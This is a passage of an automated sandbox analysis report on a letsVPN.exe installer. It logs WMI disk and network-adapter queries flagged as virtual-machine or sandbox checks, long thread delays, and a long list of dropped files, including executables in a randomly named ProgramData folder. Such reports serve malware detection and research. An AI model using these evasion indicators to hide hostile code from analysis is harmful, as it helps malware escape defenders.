              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer &lt;&gt; &apos;Microsoft&apos;))
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = &apos;tap0901&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}&quot;
              Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 3000000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2E50000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 29E0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2B20000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 4B20000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2490000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2690000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 4690000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: D70000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2920000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 4920000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: FE0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2A60000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 4A60000 memory reserve | memory write watch
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: memset,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,memcpy,GlobalFree,??3@YAXPAX@Z,17_2_003860A0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A20D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,28_2_00007FF7132A20D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 215098
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8513
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1172
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWindow / User API: threadDelayed 3068
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWindow / User API: threadDelayed 2941
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWindow / User API: threadDelayed 2107
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsDialogs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsExec.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\0zVlL\Jd0i4~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETC543.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dllJump to dropped file
